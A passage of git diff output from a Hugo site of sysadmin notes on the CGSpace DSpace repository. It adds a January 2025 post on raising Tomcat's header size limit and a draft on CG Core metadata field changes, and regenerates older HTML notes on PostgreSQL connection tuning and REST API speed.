> http://localhost:8983/solr/statistics/select?facet.range.end=NOW%2FMONTH%2B1MONTH&facet.range.gap=%2B1MONTH&facet.range.start=NOW%2FMONTH-11MONTHS&facet.range=time&facet=true&fq=-isBot%3Atrue%20AND%20statistics_type%3Aview%20AND%20bundleName%3AORIGINAL&indent=true&q.op=OR&q=type%3A0&rows=0
<!-- vim: set sw=2 ts=2: -->

38
content/posts/2025-01.md Normal file
View File

@ -0,0 +1,38 @@
---
title: "January, 2025"
date: 2025-01-03T11:09:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2025-01-03
- Trying to get search results for a large boolean query given to me by some researchers
- When searching via the Angular frontend I see an error in the Tomcat logs:
<!--more-->
```
Jan 03 09:08:40 dspace tomcat9[876]: Jan 03, 2025 9:08:40 AM org.apache.coyote.http11.Http11Processor service
Jan 03 09:08:40 dspace tomcat9[876]: INFO: Error parsing HTTP request header
Jan 03 09:08:40 dspace tomcat9[876]: Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
Jan 03 09:08:40 dspace tomcat9[876]: java.lang.IllegalArgumentException: Request header is too large
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.coyote.http11.Http11InputBuffer.fill(Http11InputBuffer.java:778)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.coyote.http11.Http11InputBuffer.parseHeader(Http11InputBuffer.java:892)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.coyote.http11.Http11InputBuffer.parseHeaders(Http11InputBuffer.java:593)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:279)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:937)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1791)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1190)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
Jan 03 09:08:40 dspace tomcat9[876]: at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:63)
Jan 03 09:08:40 dspace tomcat9[876]: at java.base/java.lang.Thread.run(Thread.java:840)
```
- The size of the query itself is 5362 bytes
- Increasing the `maxHttpHeaderSize` from the default of 8192 bytes to 16384 allows the search to complete successfully
- I notice that we had previously increased the `maxHttpHeaderSize` on the HTTP connector in Tomcat 7, which we are no longer using in Tomcat 9, so this is an overdue change
<!-- vim: set sw=2 ts=2: -->

View File

@ -0,0 +1,66 @@
+++
title = "Harmonization of CG Core Output Types"
date = 2021-02-21T13:27:35+02:00
description = "Proposed changes to CG Core types after review of several CGIAR repositories."
categories = ["Notes"]
tags = ["Migration"]
url = "cgcore-types-harmonization"
draft = true
+++
Proposed changes to the CG Core controlled vocabulary for output types after review of actual usage by several CGIAR open access repositories.
With reference to [CG Core v2 draft standard](https://agriculturalsemantics.github.io/cg-core/cgcore.html) by Marie-Angélique as well as [DCMI DCTERMS](http://www.dublincore.org/specifications/dublin-core/dcmi-terms/).
<!--more-->
- [Proposed Changes](#proposed-changes)
- [Out of Scope](#out-of-scope)
- [Implementation Progress](#implementation-progress)
## Proposed Changes
As of 2021-01-18 the scope of the changes includes the following fields:
- cg.creator.id→cg.creator.identifier
- ORCID identifiers
- dc.format.extent→dcterms.extent
- dc.date.issued→dcterms.issued
- dc.description.abstract→dcterms.abstract
- dc.description→dcterms.description
- dc.description.sponsorship→cg.contributor.donor
- values from CrossRef or Grid.ac if possible
- dc.description.version→cg.reviewStatus
- cg.fulltextstatus→cg.howPublished
- CGSpace uses values like "Formally Published" or "Grey Literature"
- dc.identifier.citation→dcterms.bibliographicCitation
- cg.identifier.status→dcterms.accessRights
- current values are "Open Access" and "Limited Access"
- future values are possibly "Open" and "Restricted"?
- dc.language.iso→dcterms.language
- current values are ISO 639-1 (aka Alpha 2)
- future values are possibly ISO 639-3 (aka Alpha 3)?
- cg.link.reference→dcterms.relation
- dc.publisher→dcterms.publisher
- dc.relation.ispartofseries will be split into:
- series name: dcterms.isPartOf
- series number: cg.number
- dc.rights→dcterms.license
- Using [SPDX license identifiers](https://spdx.org/licenses/) if possible
- dc.source→cg.journal
- dc.subject→dcterms.subject
- dc.type→dcterms.type
- dc.identifier.isbn→cg.isbn
- dc.identifier.issn→cg.issn
- cg.targetaudience→dcterms.audience
### Out of Scope
The following fields are currently out of the scope of this migration because they are used internally by DSpace 5.x/6.x and would be difficult to change without significant modifications to the core of the code:
- dc.title (`IncludePageMeta.java` only considers DC when building pageMeta, which we rely on in XMLUI because of XSLT from DRI)
- dc.title.alternative
- dc.date.available
- dc.date.accessioned
- dc.identifier.uri (hard coded for Handle assignment upon item submission)
- dc.description.provenance
- dc.contributor.author (`IncludePageMeta.java` only considers DC when building pageMeta, which we rely on in XMLUI because of XSLT from DRI)

View File

@ -15,6 +15,7 @@ With reference to [CG Core v2 draft standard](https://agriculturalsemantics.gith
<!--more-->
- [Proposed Changes](#proposed-changes)
- [Out of Scope](#out-of-scope)
- [Fields to Create](#fields-to-create)
- [Fields to Delete](#fields-to-delete)
- [Implementation Progress](#implementation-progress)
@ -54,6 +55,7 @@ As of 2021-01-18 the scope of the changes includes the following fields:
- dc.identifier.issn→cg.issn
- cg.targetaudience→dcterms.audience
### Out of Scope
The following fields are currently out of the scope of this migration because they are used internally by DSpace 5.x/6.x and would be difficult to change without significant modifications to the core of the code:
- dc.title (`IncludePageMeta.java` only considers DC when building pageMeta, which we rely on in XMLUI because of XSLT from DRI)

View File

@ -34,7 +34,7 @@ Last week I had increased the limit from 30 to 60, which seemed to help, but now
$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
78
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -64,12 +64,12 @@ $ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspac
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -116,7 +116,7 @@ $ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspac
<time datetime="2015-11-23T17:00:57+03:00">Mon Nov 23, 2015</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -126,7 +126,7 @@ $ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspac
<li>Looks like DSpace exhausted its PostgreSQL connection pool</li>
<li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li>
</ul>
<pre><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
78
</code></pre><ul>
<li>For now I have increased the limit from 60 to 90, run updates, and rebooted the server</li>
@ -137,7 +137,7 @@ $ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspac
<li>Getting emails from uptimeRobot and uptimeButler that it&rsquo;s down, and Google Webmaster Tools is sending emails that there is an increase in crawl errors</li>
<li>Looks like there are still a bunch of idle PostgreSQL connections:</li>
</ul>
<pre><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
96
</code></pre><ul>
<li>For some reason the number of idle connections is very high since we upgraded to DSpace 5</li>
@ -147,7 +147,7 @@ $ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspac
<li>Troubleshoot the DSpace 5 OAI breakage caused by nginx routing config</li>
<li>The OAI application requests stylesheets and javascript files with the path <code>/oai/static/css</code>, which gets matched here:</li>
</ul>
<pre><code># static assets we can load from the file system directly with nginx
<pre tabindex="0"><code># static assets we can load from the file system directly with nginx
location ~ /(themes|static|aspects/ReportingSuite) {
try_files $uri @tomcat;
...
@ -158,21 +158,21 @@ location ~ /(themes|static|aspects/ReportingSuite) {
<li>We simply need to add <code>include extra-security.conf;</code> to the above location block (but research and test first)</li>
<li>We should add WOFF assets to the list of things to set expires for:</li>
</ul>
<pre><code>location ~* \.(?:ico|css|js|gif|jpe?g|png|woff)$ {
<pre tabindex="0"><code>location ~* \.(?:ico|css|js|gif|jpe?g|png|woff)$ {
</code></pre><ul>
<li>We should also add <code>aspects/Statistics</code> to the location block for static assets (minus <code>static</code> from above):</li>
</ul>
<pre><code>location ~ /(themes|aspects/ReportingSuite|aspects/Statistics) {
<pre tabindex="0"><code>location ~ /(themes|aspects/ReportingSuite|aspects/Statistics) {
</code></pre><ul>
<li>Need to check <code>/about</code> on CGSpace, as it&rsquo;s blank on my local test server and we might need to add something there</li>
<li>CGSpace has been up and down all day due to PostgreSQL idle connections (current DSpace pool is 90):</li>
</ul>
<pre><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
93
</code></pre><ul>
<li>I looked closer at the idle connections and saw that many have been idle for hours (current time on server is <code>2015-11-25T20:20:42+0000</code>):</li>
</ul>
<pre><code>$ psql -c 'SELECT * from pg_stat_activity;' | less -S
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | less -S
datid | datname | pid | usesysid | usename | application_name | client_addr | client_hostname | client_port | backend_start | xact_start |
-------+----------+-------+----------+----------+------------------+-------------+-----------------+-------------+-------------------------------+-------------------------------+---
20951 | cgspace | 10966 | 18205 | cgspace | | 127.0.0.1 | | 37731 | 2015-11-25 13:13:02.837624+00 | | 20
@ -191,13 +191,13 @@ datid | datname | pid | usesysid | usename | application_name | client_addr
<li>CCAFS colleagues mentioned that the REST API is very slow, 24 seconds for one item</li>
<li>Not as bad for me, but still unsustainable if you have to get many:</li>
</ul>
<pre><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
<pre tabindex="0"><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
8.415
</code></pre><ul>
<li>Monitoring e-mailed in the evening to say CGSpace was down</li>
<li>Idle connections in PostgreSQL again:</li>
</ul>
<pre><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
66
</code></pre><ul>
<li>At the time, the current DSpace pool size was 50&hellip;</li>
@ -208,14 +208,14 @@ datid | datname | pid | usesysid | usename | application_name | client_addr
<li>Still more alerts that CGSpace has been up and down all day</li>
<li>Current database settings for DSpace:</li>
</ul>
<pre><code>db.maxconnections = 30
<pre tabindex="0"><code>db.maxconnections = 30
db.maxwait = 5000
db.maxidle = 8
db.statementpool = true
</code></pre><ul>
<li>And idle connections:</li>
</ul>
<pre><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
49
</code></pre><ul>
<li>Perhaps I need to start drastically increasing the connection limits—like to 300—to see if DSpace&rsquo;s thirst can ever be quenched</li>
@ -242,15 +242,15 @@ db.statementpool = true
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -36,7 +36,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -66,12 +66,12 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -118,7 +118,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
<time datetime="2015-12-02T13:18:00+03:00">Wed Dec 02, 2015</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -126,7 +126,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
<ul>
<li>Replace <code>lzop</code> with <code>xz</code> in log compression cron jobs on DSpace Test—it uses less space:</li>
</ul>
<pre><code># cd /home/dspacetest.cgiar.org/log
<pre tabindex="0"><code># cd /home/dspacetest.cgiar.org/log
# ls -lh dspace.log.2015-11-18*
-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18
-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
@ -137,20 +137,20 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
<li>CGSpace went down again (due to PostgreSQL idle connections of course)</li>
<li>Current database settings for DSpace are <code>db.maxconnections = 30</code> and <code>db.maxidle = 8</code>, yet idle connections are exceeding this:</li>
</ul>
<pre><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
39
</code></pre><ul>
<li>I restarted PostgreSQL and Tomcat and it&rsquo;s back</li>
<li>On a related note of why CGSpace is so slow, I decided to finally try the <code>pgtune</code> script to tune the postgres settings:</li>
</ul>
<pre><code># apt-get install pgtune
<pre tabindex="0"><code># apt-get install pgtune
# pgtune -i /etc/postgresql/9.3/main/postgresql.conf -o postgresql.conf-pgtune
# mv /etc/postgresql/9.3/main/postgresql.conf /etc/postgresql/9.3/main/postgresql.conf.orig
# mv postgresql.conf-pgtune /etc/postgresql/9.3/main/postgresql.conf
</code></pre><ul>
<li>It introduced the following new settings:</li>
</ul>
<pre><code>default_statistics_target = 50
<pre tabindex="0"><code>default_statistics_target = 50
maintenance_work_mem = 480MB
constraint_exclusion = on
checkpoint_completion_target = 0.9
@ -164,7 +164,7 @@ max_connections = 80
<li>Now I need to go read PostgreSQL docs about these options, and watch memory settings in munin etc</li>
<li>For what it&rsquo;s worth, now the REST API should be faster (because of these PostgreSQL tweaks):</li>
</ul>
<pre><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
<pre tabindex="0"><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
1.474
$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
2.141
@ -189,7 +189,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
<li>CGSpace very slow, and monitoring emailing me to say its down, even though I can load the page (very slowly)</li>
<li>Idle postgres connections look like this (with no change in DSpace db settings lately):</li>
</ul>
<pre><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
29
</code></pre><ul>
<li>I restarted Tomcat and postgres&hellip;</li>
@ -197,7 +197,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
<li>We weren&rsquo;t out of heap yet, but it&rsquo;s probably fair enough that the DSpace 5 upgrade (and new Atmire modules) requires more memory so it&rsquo;s ok</li>
<li>A possible side effect is that I see that the REST API is twice as fast for the request above now:</li>
</ul>
<pre><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
<pre tabindex="0"><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
1.368
$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
0.968
@ -214,7 +214,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
<li>CGSpace has been up and down all day and REST API is completely unresponsive</li>
<li>PostgreSQL idle connections are currently:</li>
</ul>
<pre><code>postgres@linode01:~$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>postgres@linode01:~$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
28
</code></pre><ul>
<li>I have reverted all the pgtune tweaks from the other day, as they didn&rsquo;t fix the stability issues, so I&rsquo;d rather not have them introducing more variables into the equation</li>
@ -229,7 +229,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
<li>Atmire sent <a href="https://github.com/ilri/DSpace/pull/161">some fixes</a> to DSpace&rsquo;s REST API code that was leaving contexts open (causing the slow performance and database issues)</li>
<li>After deploying the fix to CGSpace the REST API is consistently faster:</li>
</ul>
<pre><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
<pre tabindex="0"><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
0.675
$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
0.599
@ -264,15 +264,15 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -28,7 +28,7 @@ Move ILRI collection 10568/12503 from 10568/27869 to 10568/27629 using the move_
I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.
Update GitHub wiki for documentation of maintenance tasks.
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -58,12 +58,12 @@ Update GitHub wiki for documentation of maintenance tasks.
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -110,7 +110,7 @@ Update GitHub wiki for documentation of maintenance tasks.
<time datetime="2016-01-13T13:18:00+03:00">Wed Jan 13, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -135,7 +135,7 @@ Update GitHub wiki for documentation of maintenance tasks.
<li>Tweak date-based facets to show more values in drill-down ranges (<a href="https://github.com/ilri/DSpace/issues/162">#162</a>)</li>
<li>Need to remember to clear the Cocoon cache after deployment or else you don&rsquo;t see the new ranges immediately</li>
<li>Set up recipe on IFTTT to tweet new items from the CGSpace Atom feed to my twitter account</li>
<li>Altmetrics' support for Handles is kinda weak, so they can&rsquo;t associate our items with DOIs until they are tweeted or blogged, etc first.</li>
<li>Altmetrics&rsquo; support for Handles is kinda weak, so they can&rsquo;t associate our items with DOIs until they are tweeted or blogged, etc first.</li>
</ul>
<h2 id="2016-01-21">2016-01-21</h2>
<ul>
@ -200,15 +200,15 @@ $ find SimpleArchiveForBio/ -iname &ldquo;*.pdf&rdquo; -exec basename {} ; | sor
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -38,7 +38,7 @@ I noticed we have a very interesting list of countries on CGSpace:
Not only are there 49,000 countries, we have some blanks (25)&hellip;
Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&rdquo;
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -68,12 +68,12 @@ Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&r
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -120,7 +120,7 @@ Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&r
<time datetime="2016-02-05T13:18:00+03:00">Fri Feb 05, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -140,20 +140,20 @@ Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&r
<li>Found a way to get items with null/empty metadata values from SQL</li>
<li>First, find the <code>metadata_field_id</code> for the field you want from the <code>metadatafieldregistry</code> table:</li>
</ul>
<pre><code>dspacetest=# select * from metadatafieldregistry;
<pre tabindex="0"><code>dspacetest=# select * from metadatafieldregistry;
</code></pre><ul>
<li>In this case our country field is 78</li>
<li>Now find all resources with type 2 (item) that have null/empty values for that field:</li>
</ul>
<pre><code>dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value='' OR text_value IS NULL);
<pre tabindex="0"><code>dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value=&#39;&#39; OR text_value IS NULL);
</code></pre><ul>
<li>Then you can find the handle that owns it from its <code>resource_id</code>:</li>
</ul>
<pre><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '22678';
<pre tabindex="0"><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = &#39;22678&#39;;
</code></pre><ul>
<li>It&rsquo;s 25 items so editing in the web UI is annoying, let&rsquo;s try SQL!</li>
</ul>
<pre><code>dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value='';
<pre tabindex="0"><code>dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value=&#39;&#39;;
DELETE 25
</code></pre><ul>
<li>After that perhaps a regular <code>dspace index-discovery</code> (no -b) <em>should</em> suffice&hellip;</li>
@ -171,7 +171,7 @@ DELETE 25
<li>I need to start running DSpace in Mac OS X instead of a Linux VM</li>
<li>Install PostgreSQL from homebrew, then configure and import CGSpace database dump:</li>
</ul>
<pre><code>$ postgres -D /opt/brew/var/postgres
<pre tabindex="0"><code>$ postgres -D /opt/brew/var/postgres
$ createuser --superuser postgres
